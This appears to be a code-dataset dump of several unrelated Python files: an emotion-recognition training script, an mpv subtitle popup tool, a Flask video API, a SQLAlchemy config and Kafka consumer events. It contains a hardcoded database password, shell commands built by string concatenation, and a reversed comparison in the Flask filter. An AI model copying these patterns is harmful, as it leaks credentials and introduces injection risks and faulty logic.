validation_data=(x_valid_audio, y_valid), verbose=1,\n callbacks=[early_stopping, checkpoint_callback])\n elif source == 'text':\n model.fit(x_train_text, y_train, batch_size=batch_size, epochs=epochs, class_weight=weights,\n validation_data=(x_valid_text, y_valid), verbose=1,\n callbacks=[early_stopping, checkpoint_callback])\n else:\n model.fit([x_train_audio, x_train_text], y_train, batch_size=batch_size, epochs=epochs, class_weight=weights,\n validation_data=([x_valid_audio, x_valid_text], y_valid), verbose=1,\n callbacks=[early_stopping, checkpoint_callback])\n\n\ndef get_custom_objects():\n custom_objects = {'GmuLayer': GmuLayer, 'TflLayer': TflLayer, 'Attention': Attention,\n 'GgfLayer': GgfLayer, 'AdditiveAttention': AdditiveAttention}\n return custom_objects\n\n\ndef test():\n x_test_audio, x_test_text, y_test= load_data(flags.FLAGS.test_filename)\n print(x_test_audio.shape, x_test_text.shape, y_test.shape)\n\n source = flags.FLAGS.source\n fusion = flags.FLAGS.fusion\n model = load_model('models/{}-{}-best.h5'.format(source, fusion), custom_objects=get_custom_objects())\n\n if source == 'audio':\n scores = model.evaluate(x_test_audio, y_test)\n print('scores: ', scores)\n predictions = model.predict(x_test_audio).argmax(axis=-1)\n elif source == 'text':\n scores = model.evaluate(x_test_text, y_test)\n print('scores: ', scores)\n predictions = model.predict(x_test_text).argmax(axis=-1)\n else:\n scores = model.evaluate([x_test_audio, x_test_text], y_test)\n print('scores: ', scores)\n predictions = model.predict([x_test_audio, x_test_text]).argmax(axis=-1)\n\n print('accuracy: {:.4f}'.format(accuracy_score(y_test, predictions)))\n print(classification_report(y_test, predictions, digits=4, target_names=LABEL_NAMES))\n print(confusion_matrix(y_test, predictions))\n\n\nif __name__ == '__main__':\n mode = flags.FLAGS.mode\n if mode == 'train':\n train()\n elif mode == 'test':\n test()\n else:\n print('Unsupported mode: {}'.format(mode))\n","repo_name":"ppfliu/emotion-recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"26463767476","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport subprocess\n\nimport time\n\nfrom json import loads\n\nfrom PyQt5 import QtWebEngineWidgets\nfrom PyQt5.QtCore import Qt, QThread, QObject, QSize, QPointF\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot\nfrom PyQt5.QtCore import QUrl, QPoint, QRect\nfrom PyQt5.QtWidgets import QTextEdit, QFrame, QApplication\n\nfrom PyQt5.QtGui import QTextCursor, QFont, QPainter, QPen, QColor\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout\n\nimport math\n\nimport socket\n\nimport warnings\n\npth = os.path.expanduser('~/.config/mpv/scripts/')\nos.chdir(pth)\nimport rikai_config as config\n\n# the import below is extremely useful to debug events by printing their type\n# with `print(event_lookup[str(event.type())])`\n# from event_lookup import event_lookup\n\n\ndef sign(x):\n if x >= 0:\n return 1\n else:\n return -1\n\n\ndef mpv_pause():\n os.system('echo \\'{ \"command\": [\"set_property\", \"pause\", true] }\\' | socat - \"' + mpv_socket + '\" > /dev/null')\n\n\ndef mpv_resume():\n os.system('echo \\'{ \"command\": [\"set_property\", \"pause\", false] }\\' | socat - \"'\n + mpv_socket + '\" > /dev/null')\n\n\ndef mpv_pause_status():\n stdoutdata = subprocess.getoutput(\n 'echo \\'{ \"command\": [\"get_property\", \"pause\"] }\\' | socat - \"' + mpv_socket + '\"')\n \n try:\n return loads(stdoutdata)['data']\n except Exception:\n return mpv_pause_status()\n\n\ndef mpv_fullscreen_status():\n stdoutdata = subprocess.getoutput('echo \\'{ \"command\": [\"get_property\", \"fullscreen\"] }\\' | socat - \"'\n + mpv_socket + '\"')\n try:\n return loads(stdoutdata)['data']\n except Exception:\n return mpv_fullscreen_status()\n\n\nclass thread_subtitles(QObject):\n update_subtitles = pyqtSignal(bool, str)\n \n @pyqtSlot()\n def main(self):\n subs = \"\"\n hidden = True\n check_time_fullscreen = 0.1\n \n inc = 0\n assert check_time_fullscreen > config.update_time\n ratio = int(check_time_fullscreen / config.update_time)\n \n tmp_file_subs = ''\n \n while 1:\n time.sleep(config.update_time)\n \n # hide subs when mpv isn't in focus or in fullscreen\n if inc > ratio:\n inc = 0\n if mpv_fullscreen_status():\n hidden = False\n else:\n if hidden is not True: # no need to emit if already hidden\n hidden = True\n self.update_subtitles.emit(True, tmp_file_subs)\n inc += 1\n \n if not hidden:\n try:\n tmp_file_subs = open(sub_file).read()\n except Exception:\n continue\n \n if tmp_file_subs != subs:\n self.update_subtitles.emit(False, tmp_file_subs)\n \n subs = tmp_file_subs\n\n\nclass Popup(QtWebEngineWidgets.QWebEngineView):\n def __init__(self, parent=None):\n super(QtWebEngineWidgets.QWebEngineView, self).__init__()\n self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground)\n \n webEnginePage = self.page()\n webEnginePage.setBackgroundColor(Qt.transparent)\n \n self.setWindowFlags(Qt.X11BypassWindowManagerHint)\n \n self.zoom_rate = parent.parent.config.default_zoom_popup\n self.setZoomFactor(self.zoom_rate)\n \n self.html_path = os.path.join(os.path.expanduser('~/.config/mpv/scripts/'),\n 'rikai-mpv/rikaichamp-backend/web_page/my_attempt.html')\n \n # used for rounding when rezooming\n self.last_round = 1\n \n # used to keep track of zoom changes\n self.zoom_timed = 0\n \n # this record the vertical scrolling in the popup\n self.scroll_y = 0\n \n def change_zoom(self, event):\n # Ctrl+Alt+\"+\" or Ctrl+Alt+\"-\" for zooming\n if ((event.modifiers() & Qt.ControlModifier)\n and (event.modifiers() & Qt.AltModifier)):\n proceed_zooming = False\n if event.key() == Qt.Key_Up and self.zoom_rate < 2:\n proceed_zooming = True\n up_or_down = 1\n \n if event.key() == Qt.Key_Down and self.zoom_rate > 0.3:\n proceed_zooming = True\n up_or_down = -1\n \n if proceed_zooming is True:\n self.zoom_rate = self.zoom_rate + up_or_down * 0.05\n self.zoom_timed = self.zoom_timed + up_or_down\n \n self.setZoomFactor(self.zoom_rate)\n \n new_width = self.width() + up_or_down * self.base_width * 0.05\n new_height = self.height() + up_or_down * self.base_height * 0.05\n \n new_width_int, new_height_int = self.round_up_down(new_width, new_height)\n\n self.move(self.pos().x(),\n self.pos().y() + self.height() - new_height_int)\n \n self.resize(new_width_int, new_height_int)\n \n # this function is needed because depending on the rounding we apply and if the zoom\n # is changed many times, we may encounter unexpected position / size.\n def round_up_down(self, x, y):\n if self.last_round == -1:\n self.last_round = 1\n return math.ceil(x), math.ceil(y)\n else:\n self.last_round = -1\n return math.floor(x), math.floor(y)\n\n\nclass TextWidget(QTextEdit):\n def __init__(self, parent=None):\n super().__init__()\n \n self.setMouseTracking(True)\n self.setReadOnly(True)\n self.setCursorWidth(0)\n \n self.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n \n self.setAlignment(Qt.AlignVCenter)\n \n self.setLineWrapMode(QTextEdit.LineWrapMode.NoWrap)\n \n self.document().setDocumentMargin(0)\n self.setContentsMargins(0, 0, 0, 0)\n \n self.verticalScrollBar().setEnabled(False)\n self.horizontalScrollBar().setEnabled(False)\n \n self.n_lines = 1\n \n self.text = \"\"\n \n self.previous_lookup = \"\"\n \n self.parent = parent\n self.pos_parent = QPoint(0, 0)\n \n self.popup = Popup(self)\n self.popup.move(self.parent.config.x_screen, self.parent.config.y_screen)\n self.popup.resize(800, 800)\n \n font = self.currentFont()\n font.setPointSize(self.parent.config.default_font_point_size)\n font.setStyleStrategy(QFont.StyleStrategy.PreferAntialias)\n self.setFont(font)\n \n self.render_ready = 0\n \n self.released = True\n \n # `True` corresponds to the case where there is currently no popup being shown\n self.no_popup = True\n \n self.transparent_pen = QPen(Qt.transparent)\n self.outline_pen = QPen(Qt.black, 8)\n \n # whether or not the cursor is on the QTextEdit\n self.already_in = False\n \n # index of the character the mouse is on when popup is to be shown\n self.char_index_popup = -1\n \n # number of characters to highlight when the popup is shown\n self.length_highlight = 0\n \n # execution after the html of the popup has been loaded\n self.popup.loadFinished.connect(self.after_popup_loaded)\n \n self.popup_showing_ready = True\n \n # set to True when a warning message to show only once has been shown\n self.warning_message_unique_shown = False\n \n def after_popup_loaded(self, arg):\n self.popup.page().runJavaScript(\n \"\"\"\n try {\n document.getElementById('rikaichamp-window').scrollWidth;\n }\n catch(err) {\n err.message;\n }\n \"\"\",\n self.callback_popup_width)\n \n self.popup.page().runJavaScript(\n \"\"\"\n try {\n document.getElementById('rikaichamp-window').scrollHeight;\n }\n catch(err) {\n err.message;\n }\n \"\"\",\n self.callback_popup_height)\n \n def callback_popup_height(self, new_height):\n if new_height != \"Cannot read property 'scrollHeight' of null\":\n self.popup.base_height = new_height\n \n self.popup_showing_ready = True # From here, we don't care about the .html file\n \n self.show_popup()\n else:\n warnings.warn('Popup page loading has failed and this should not happen.'\n + ' Please fill a bug report if this gets inconvenient.',\n stacklevel=2)\n \n def callback_popup_width(self, new_width):\n if new_width != \"Cannot read property 'scrollHeight' of null\":\n self.popup.base_width = new_width\n else:\n warnings.warn('Popup page loading has failed and this should not happen.'\n + ' Please fill a bug report if this gets inconvenient.',\n stacklevel=2)\n \n def show_popup(self):\n if self.already_in: # it could be that we exited the subtitles before getting there\n # we need this to take into account the zoom setting previously set\n \n width = self.popup.base_width * (self.parent.config.default_zoom_popup\n + 0.05 * self.popup.zoom_timed) + 5\n height = self.popup.base_height * (self.parent.config.default_zoom_popup\n + 0.05 * self.popup.zoom_timed) + 5\n \n # the pop up is shown above the subtitles, and it should not excess the\n # available space there, namely `self.pos_parent.y()`\n height = min(self.pos_parent.y(), height)\n \n width = int(width)\n height = int(height)\n \n char_index = self.char_index_popup\n self.set_text_selection(char_index, char_index + self.length_highlight)\n \n rect = self.cursorRect(self.textCursor())\n \n # absolute coordinate of the top left of the current selection\n cursor_top = self.viewport().mapToGlobal(QPoint(rect.left(), rect.top()))\n \n x_screen = self.parent.config.x_screen\n x_popup = (cursor_top.x()\n - self.fontMetrics().width(self.text[char_index:char_index\n + self.length_highlight])\n + self.fontMetrics().width(self.text[char_index]) // 4)\n \n # make sure we don't go out of the screen\n if x_popup + width >= (x_screen + self.parent.config.screen_width):\n x_popup = x_screen + self.parent.config.screen_width - width\n \n y_popup = max(0, self.pos_parent.y() - height)\n \n # we need to be careful to never cover the QTextEdit when changing popup\n if self.popup.height() > height:\n self.popup.resize(width, height)\n self.popup.move(x_popup, y_popup)\n else:\n self.popup.move(x_popup, y_popup)\n self.popup.resize(width, height)\n \n self.popup.show()\n \n self.no_popup = True\n \n def mouseMoveEvent(self, event):\n point_position = event.pos() # this is relative coordinates in the QTextEdit\n char_index = self.document().documentLayout().hitTest(\n QPointF(point_position.x(), point_position.y()),\n Qt.HitTestAccuracy.ExactHit)\n \n if (self.text[char_index:] != self.previous_lookup\n and 0 <= char_index\n and char_index < self.len_text):\n \n self.previous_lookup = self.text[char_index:]\n self.setUpdatesEnabled(True) # we needs updates for highlighting text\n self.no_popup = False # a popup is likely to be shown, disable highlighting\n \n # print('Looking up', self.text[char_index:], '...')\n \n client.send(self.text[char_index:].encode())\n \n data_received = None\n while True: # this is subideal and should probably be in in a separate thread\n data_received = client.recv(1024)\n \n decoded_data = data_received.decode()\n \n if decoded_data.startswith('ready'): # node has finished its processing\n nb_highlight = int(decoded_data[5:]) # the beginning is 'ready'\n\n if nb_highlight == -1: # e.g., the popup is empty\n show_popup = False\n self.popup.hide() # hide it in case it was already shown\n self.set_text_selection(0, 0)\n else:\n show_popup = True\n self.length_highlight = nb_highlight\n \n break\n \n if show_popup is True:\n self.popup.scroll_y = 0\n self.char_index_popup = char_index\n self.popup_reset = True\n \n # this resize is \"needed\" as I could so far not set the width of\n # the popup no matter the size of the window. We make it bigger so that\n # the `scrollWidth` value we get later makes sense\n resize_value = (self.parent.config.x_screen\n + self.parent.config.screen_width - self.popup.pos().x())\n self.popup.resize(resize_value, self.popup.height())\n \n # this show is needed to record later on the right size of the popup\n # in case it was not shown already\n self.popup.show()\n \n if self.popup_showing_ready:\n self.popup_showing_ready = False\n self.popup.load(QUrl.fromLocalFile(self.popup.html_path))\n else:\n # the previous .html file is still being used, which is typically\n # the case when the mouse moves too fast. This is really subideal and\n # an other solution should be found to avoid reading and writing .html\n # files at the same time...\n if not self.warning_message_unique_shown:\n warnings.warn('Ignore this popup showing as it is likely to fail.'\n + ' Please fill a bug report if this gets inconvenient.'\n + \" This warning won't be shown again.\",\n stacklevel=2)\n self.warning_message_unique_shown = True\n pass\n \n def enterEvent(self, event):\n # the case where this event is triggered several times has been encountered,\n # hence the `self.already_in`\n if not self.already_in:\n self.already_in = True\n self.setUpdatesEnabled(True)\n self.previously_paused = mpv_pause_status()\n mpv_pause()\n \n super().enterEvent(event)\n \n def leaveEvent(self, event):\n if not self.previously_paused:\n mpv_resume()\n \n self.already_in = False\n \n self.setUpdatesEnabled(True)\n \n # reset selection\n self.set_text_selection(0, 0)\n \n # reset it in case we want to look back at the same position\n self.previous_lookup = \"\"\n \n # hiding popup in case it was shown\n self.popup.hide()\n \n super().leaveEvent(event)\n \n def mousePressEvent(self, event):\n # we want to zoom in/out the popup, but set focus to this QTextEdit because\n # I could not redirect properly the keyPress events to the popup\n if event.button() == Qt.MouseButton.RightButton:\n self.activateWindow()\n self.setFocus()\n \n # we want to set focus to the parent frame, to likely zoom in/out the subtitles\n elif event.button() == Qt.LeftButton:\n super().mousePressEvent(event)\n self.parent.activateWindow()\n self.parent.setFocus()\n else:\n pass\n \n def keyPressEvent(self, event): # this should handle only the popup zoom\n self.popup.change_zoom(event)\n super().keyPressEvent(event)\n \n # we do not want the context menu to display and steal focus\n def contextMenuEvent(self, event):\n pass\n \n def paintEvent(self, event):\n # this is just a trick to avoid an infinite loop due to the painting of the\n # outline, as the line `my_cursor.select(QTextCursor.SelectionType.Document)`\n # triggers a recursive call to `paintEvent`\n self.render_ready += 1\n \n if self.render_ready > 3 and self.no_popup:\n self.setUpdatesEnabled(False)\n \n # Showing the outline is really slow (at times, more than 100 ms) and\n # we do not want to do it when the user shows popups, as it slows everything down.\n # Ideally, it could probably be in a separate thread.\n if not self.already_in:\n painter = QPainter(self.viewport())\n \n my_cursor = self.textCursor()\n my_char_format = my_cursor.charFormat()\n \n my_char_format.setTextOutline(self.outline_pen)\n \n my_cursor.select(QTextCursor.SelectionType.Document)\n my_cursor.mergeCharFormat(my_char_format)\n \n self.document().drawContents(painter)\n \n my_char_format.setTextOutline(self.transparent_pen)\n my_cursor.mergeCharFormat(my_char_format)\n \n super().paintEvent(event)\n \n # wheel events are unfortunately captured by the QTextEdit, but should be redirected\n # to the popup in case the entries take too much place\n def wheelEvent(self, event):\n # reasonable scroll policy. Note however that system-wide pad up/down movement\n # setting may not apply and has not been tested\n self.popup.scroll_y = (- sign(event.angleDelta().y())\n * self.parent.config.screen_height / 15)\n \n script = f\"window.scrollTo(0, document.scrollingElement.scrollTop + {self.popup.scroll_y});\"\n self.popup.page().runJavaScript(script)\n \n def minimumSizeHint(self):\n return QSize(5, 5)\n \n def set_text_selection(self, start, end):\n cursor = self.textCursor()\n cursor.setPosition(start)\n cursor.setPosition(end, QTextCursor.KeepAnchor)\n self.setTextCursor(cursor)\n\n\nclass ParentFrame(QFrame):\n def __init__(self, config):\n super().__init__()\n \n self.thread_subs = QThread()\n self.obj = thread_subtitles()\n self.obj.update_subtitles.connect(self.render_subtitles)\n self.obj.moveToThread(self.thread_subs)\n self.thread_subs.started.connect(self.obj.main)\n self.thread_subs.start()\n \n self.config = config\n \n self.setWindowFlags(Qt.X11BypassWindowManagerHint)\n \n self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground, True)\n self.setStyleSheet(config.style_subs)\n \n self.subtext = TextWidget(parent=self)\n \n self.subtitles_vbox = QVBoxLayout(self)\n self.subtitles_vbox.addStretch()\n self.v_margin = 0\n self.subtitles_vbox.setContentsMargins(0, self.v_margin, 0, self.v_margin)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.subtext)\n \n self.subtitles_vbox.addLayout(hbox)\n self.subtitles_vbox.addStretch()\n \n # we add some pixels to the semi-transparent background, up and down\n self.stretch_pixels = 20\n \n def render_subtitles(self, to_hide, text):\n # print(\"-------\")\n # print(\"Input: `\" + text + \"`\")\n self.subtext.render_ready = 0\n \n if to_hide or not len(text):\n try:\n self.subtext.clear()\n self.hide()\n finally:\n return\n\n self.subtext.setUpdatesEnabled(True)\n self.subtext.clear()\n self.repaint()\n \n self.subtext.setAlignment(Qt.AlignCenter) # this should be before .show()\n self.show()\n\n subs2 = text\n \n subs2 = subs2.split('\\n')\n for i in range(len(subs2)):\n subs2[i] = subs2[i].strip()\n subs2[i] = \" \" + subs2[i] + \" \"\n \n subs2 = '\\n'.join(subs2)\n \n self.subtext.len_text = len(subs2)\n self.subtext.text = subs2\n self.subtext.text_splitted = subs2.split('\\n')\n self.subtext.n_lines = len(self.subtext.text_splitted)\n \n # the longest line is not necessarily the one with the most characters\n # as we may use non-monospace fonts\n width_subtext = 0\n for line in self.subtext.text_splitted:\n width_subtext = max(width_subtext,\n self.subtext.fontMetrics().boundingRect(\n QRect(),\n Qt.AlignCenter,\n line).width()\n + 4)\n \n height_subtext = self.subtext.fontMetrics().height() * self.subtext.n_lines + 4\n \n width = width_subtext\n height = height_subtext + self.stretch_pixels\n \n x = (self.config.screen_width / 2) - (width / 2)\n y = self.config.screen_height - height - config.bottom_spacing_pixels\n \n self.setGeometry(config.x_screen + int(x),\n config.y_screen + int(y),\n width, height)\n \n self.subtext.setGeometry(0, self.stretch_pixels // 2,\n width_subtext, height_subtext)\n \n for line in self.subtext.text_splitted:\n self.subtext.append(line)\n \n self.subtext.pos_parent = self.pos()\n \n self.subtext.render_ready += 1\n \n def keyPressEvent(self, event):\n self.subtext.setUpdatesEnabled(True)\n \n # Ctrl+Alt+\"+\" or Ctrl+Alt+\"-\" for zooming\n if ((event.modifiers() & Qt.ControlModifier)\n and (event.modifiers() & Qt.AltModifier)):\n \n # check if non-zero later, and act accordingly\n resized = 0\n \n if event.key() == Qt.Key_Up:\n resized = 2\n if event.key() == Qt.Key_Down:\n resized = -2\n \n if resized != 0:\n self.subtext.render_ready = 0\n \n font = self.subtext.currentFont()\n font.setPointSize(font.pointSize() + resized)\n self.subtext.setFont(font)\n \n width_subtext = 0\n for line in self.subtext.text_splitted:\n width_subtext = max(width_subtext,\n self.subtext.fontMetrics().boundingRect(\n QRect(),\n Qt.AlignCenter,\n line).width()\n + 4)\n height_subtext = (self.subtext.fontMetrics().height()\n * self.subtext.n_lines + 4)\n \n width = width_subtext\n height = height_subtext + self.stretch_pixels\n \n x = (self.config.screen_width / 2) - (width / 2)\n y = self.config.screen_height - height - config.bottom_spacing_pixels\n \n self.setGeometry(config.x_screen + int(x),\n config.y_screen + int(y),\n width, height)\n \n self.subtext.setGeometry(0, self.stretch_pixels // 2,\n width_subtext, height_subtext)\n\n self.subtext.pos_parent = self.pos()\n \n self.subtext.render_ready += 1\n \n def paintEvent(self, event):\n if self.subtext.render_ready >= 1:\n p = QPainter(self)\n p.fillRect(event.rect(), QColor(0, 0, 0, 128))\n \n super().paintEvent(event)\n\n\nif __name__ == \"__main__\":\n print('[rikai-mpv] Starting rikai-mpv in python...')\n \n mpv_socket = sys.argv[1]\n sub_file = sys.argv[2]\n # sub_file = '/tmp/mpv_sub_'\n # mpv_socket = '/tmp/mpv_socket_'\n \n # the `mpv_socket` at the end is just a trick to handle termination in lua,\n # so that we can find the node process with `pkill` or `pgrep`\n command = ('node '\n + os.path.join(os.path.expanduser('~/.config/mpv/scripts/'),\n 'rikai-mpv/rikaichamp-backend/extension/background_search_html.js')\n + ' '\n + mpv_socket)\n \n command_splitted = command.split(' ')\n \n print(\"Launching node.js backend...\")\n subprocess.Popen(command_splitted, shell=False)\n\n print(\"Connecting from Python...\")\n while True:\n try:\n client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n client.connect(os.path.join(os.path.expanduser('~/.config/mpv/scripts/'),\n \"rikai-mpv/my_socket\"))\n except Exception:\n time.sleep(0.1)\n continue\n break\n print(\"python <---> node.js socket connected.\")\n \n app = QApplication(sys.argv)\n \n config.screen_width = app.screens()[config.n_screen].size().width()\n config.screen_height = app.screens()[config.n_screen].size().height()\n config.x_screen = app.screens()[config.n_screen].geometry().x()\n config.y_screen = app.screens()[config.n_screen].geometry().y()\n \n form = ParentFrame(config)\n form.show()\n app.exec_()\n","repo_name":"fxmarty/rikai-mpv","sub_path":"subtitles_popup_graphics.py","file_name":"subtitles_popup_graphics.py","file_ext":"py","file_size_in_byte":26817,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"15696673901","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nauthor: S.M. Sabbir Amin\ndate: 23 Jun 2021\nemail: sabbiramin.cse11ruet@gmail.com, sabbir@rokomari.com\n\n\"\"\"\nimport operator\nfrom flask import request, jsonify\nfrom playhouse.shortcuts import model_to_dict\nfrom webargs import fields\nfrom webargs.flaskparser import use_args\nfrom wtfpeewee._compat import reduce\n\nfrom app import app\nfrom app.models import Video\n\nuser_args = {\n 'page': fields.Int(missing=1),\n 'size': fields.Int(missing=30),\n 'tags': fields.DelimitedList(fields.Str()),\n 'view_count_lt': fields.Int(required=False),\n 'view_count_gt': fields.Int(required=False),\n 'view_count_eq': fields.Int(required=False),\n 'like_count_lt': fields.Int(required=False),\n 'like_count_gt': fields.Int(required=False),\n 'like_count_eq': fields.Int(required=False),\n 'comment_count_lt': fields.Int(required=False),\n 'comment_count_gt': fields.Int(required=False),\n 'comment_count_eq': fields.Int(required=False),\n\n}\n\n\n@app.route('/api/v1/videos', methods=['GET'])\n@use_args(user_args, location='query')\ndef get_videos(args):\n page = args.get('page')\n size = args.get('size')\n tags = args.get('tags')\n view_count_lt = args.get('view_count_lt')\n view_count_gt = args.get('view_count_gt')\n view_count_eq = args.get('view_count_eq')\n like_count_lt = args.get('like_count_lt')\n like_count_gt = args.get('like_count_gt')\n like_count_eq = args.get('like_count_eq')\n comment_count_lt = args.get('comment_count_lt')\n comment_count_gt = args.get('comment_count_gt')\n comment_count_eq = args.get('comment_count_eq')\n dislike_count_lt = args.get('dislike_count_lt')\n dislike_count_gt = args.get('dislike_count_gt')\n dislike_count_eq = args.get('dislike_count_eq')\n\n sql_clause = list()\n for k, v in args.items():\n if view_count_eq:\n sql_clause.append(Video.view_count == view_count_eq)\n if view_count_lt:\n sql_clause.append(Video.view_count > view_count_lt)\n if view_count_gt:\n sql_clause.append(Video.view_count > view_count_gt)\n if tags:\n for tag in tags:\n sql_clause.append(Video.tags.contains(tag))\n if like_count_lt:\n sql_clause.append(Video.like_count < like_count_lt)\n if like_count_gt:\n sql_clause.append(Video.like_count > like_count_gt)\n if like_count_eq:\n sql_clause.append(Video.like_count == like_count_eq)\n if comment_count_lt:\n sql_clause.append(Video.comment_count < comment_count_lt)\n if comment_count_gt:\n sql_clause.append(Video.comment_count > comment_count_gt)\n if comment_count_eq:\n sql_clause.append(Video.comment_count == comment_count_eq)\n if dislike_count_lt:\n sql_clause.append(Video.dislike_count < dislike_count_lt)\n if dislike_count_gt:\n sql_clause.append(Video.dislike_count > dislike_count_gt)\n if dislike_count_eq:\n sql_clause.append(Video.dislike_count == dislike_count_eq)\n\n try:\n exp = reduce(operator.and_, sql_clause)\n except Exception as e:\n print('Error Compressing SQL:', e)\n exp = None\n\n if exp:\n queryset = Video.select().where(exp).paginate(page, size)\n else:\n queryset = Video.select().paginate(page, size)\n models = [model_to_dict(r) for r in queryset]\n response = dict()\n response['count'] = len(models)\n response['models'] = models\n return jsonify(response)\n","repo_name":"sabbiramin113008/py_tube","sub_path":"app/api/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32377823820","text":"from sqlalchemy import create_engine, MetaData\nfrom sqlalchemy.orm import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine(\n \"mysql+pymysql://admin_cesfam:cesfam1359@localhost:3306/dbcesfam\",\n connect_args={'connect_timeout': 600},\n pool_pre_ping=True\n)\nSession = sessionmaker(autocommit=False, autoflush=False, bind=engine)\nsession = Session() \n\nBase = declarative_base()\n\ndef get_db():\n try:\n db = Session()\n yield db\n finally:\n db.close()","repo_name":"vcrolack/farmacia-cesfam-backend","sub_path":"config/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12162662126","text":"\n\ndef intervalIntersection(A, B):\n aIndex = 0\n bIndex = 0\n toReturn = []\n arg1 = A[aIndex]\n arg2 = B[bIndex]\n flag = True\n\n def compareArrs(aArr, bArr):\n signifyInd = \"\"\n zipComp = zip(aArr, bArr)\n compList = list(zipComp)\n lowIntSec = max(compList[0])\n highIntSec = min(compList[1])\n\n if aArr[0] > bArr[1]:\n signifyInd = \"B\"\n intersection = \"NO INTERSECTION\"\n elif bArr[0] > aArr[1]:\n signifyInd = \"A\"\n intersection = \"NO INTERSECTION\"\n else:\n if aArr[1] == highIntSec:\n signifyInd = \"A\"\n elif bArr[1] == highIntSec:\n signifyInd = \"B\"\n\n intersection = [lowIntSec, highIntSec]\n\n return [intersection, signifyInd]\n\n while flag:\n arg1 = A[aIndex]\n arg2 = B[bIndex]\n flag = False\n result = compareArrs(arg1, arg2)\n print(result)\n if result[0] == \"NO INTERSECTION\":\n pass\n else:\n toReturn.append(result[0])\n\n if result[1] == \"A\":\n if aIndex == len(A)-1:\n print(toReturn)\n return toReturn\n else:\n aIndex += 1\n print(\"aIndex\", aIndex)\n flag = True\n\n elif result[1] == \"B\":\n if bIndex == len(B)-1:\n print(toReturn)\n return toReturn\n else:\n bIndex += 1\n print(\"bIndex\", bIndex)\n flag = True\n\n return toReturn\n\n\nA = [[0, 2], [5, 10], [13, 23], [24, 25]]\n\nB = [[1, 5], [8, 12], [15, 24], [25, 26]]\n\n\nintervalIntersection(A, B)\n","repo_name":"theolamide/Whiteboard","sub_path":"Python/intervalIntersection.py","file_name":"intervalIntersection.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"19770907592","text":"from abc import ABC, abstractmethod\r\nfrom typing import Generic, TypeVar, Type\r\n\r\nfrom pydantic import BaseModel\r\n\r\nfrom services import RestaurantService, RestaurantManagerService\r\nfrom uow import SqlAlchemyUnitOfWork\r\nfrom utils.uow import uow_transaction, uow_transaction_with_commit\r\n\r\nfrom .schemas import RestaurantApplicationConfirmedSchema, RestaurantActivatedSchema, RestaurantDeactivatedSchema, \\\r\n RestaurantManagerCreatedSchema\r\n\r\n__all__ = [\r\n \"ConsumerEvent\",\r\n \"RestaurantApplicationConfirmedEvent\",\r\n \"RestaurantActivatedEvent\",\r\n \"RestaurantDeactivatedEvent\",\r\n \"RestaurantManagerCreatedEvent\",\r\n]\r\n\r\nBaseEventSchema = TypeVar(\"BaseEventSchema\", bound=BaseModel)\r\n\r\n\r\nclass ConsumerEvent(Generic[BaseEventSchema], ABC):\r\n \"\"\"\r\n Base class for all consumer events.\r\n\r\n Consumer events are used for simplifying receiving messages from Kafka and processing them.\r\n\r\n Attributes:\r\n schema_class (Type[BaseEventSchema]): The schema class for the event's data.\r\n \"\"\"\r\n\r\n schema_class: Type[BaseEventSchema] = None\r\n\r\n def __init__(self, data: dict):\r\n \"\"\"\r\n Constructor for the inherited classes from ConsumerEvent class.\r\n\r\n Args:\r\n data (dict): The received data.\r\n \"\"\"\r\n\r\n self._data: BaseEventSchema = self.schema_class(**data)\r\n\r\n @abstractmethod\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Action to be executed on the event.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n raise NotImplementedError\r\n\r\n @classmethod\r\n def get_event_name(cls) -> str:\r\n \"\"\"\r\n Returns the name of the event.\r\n\r\n Returns:\r\n str: Name of the event.\r\n \"\"\"\r\n\r\n return cls.__name__\r\n\r\n\r\nclass RestaurantApplicationConfirmedEvent(ConsumerEvent[RestaurantApplicationConfirmedSchema]):\r\n \"\"\"\r\n Event when RestaurantApplication is confirmed.\r\n \"\"\"\r\n\r\n schema_class = RestaurantApplicationConfirmedSchema\r\n\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Creates a new restaurant.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n restaurant_service = RestaurantService()\r\n\r\n async with uow_transaction_with_commit(uow) as uow:\r\n await restaurant_service.create(self._data, uow)\r\n\r\n\r\nclass RestaurantActivatedEvent(ConsumerEvent[RestaurantActivatedSchema]):\r\n \"\"\"\r\n Event when Restaurant is activated.\r\n \"\"\"\r\n\r\n schema_class = RestaurantActivatedSchema\r\n\r\n async def action(self, uow: SqlAlchemyUnitOfWork):\r\n \"\"\"\r\n Activates a restaurant.\r\n\r\n Args:\r\n uow (SqlAlchemyUnitOfWork): The unit of work instance.\r\n \"\"\"\r\n\r\n restaurant_service = RestaurantService()\r\n\r\n async with uow_transaction_with_commit(uow) as uow:\r\n await restaurant_service.activate(self._data.id, uow)\r\n\r\n\r\nclass 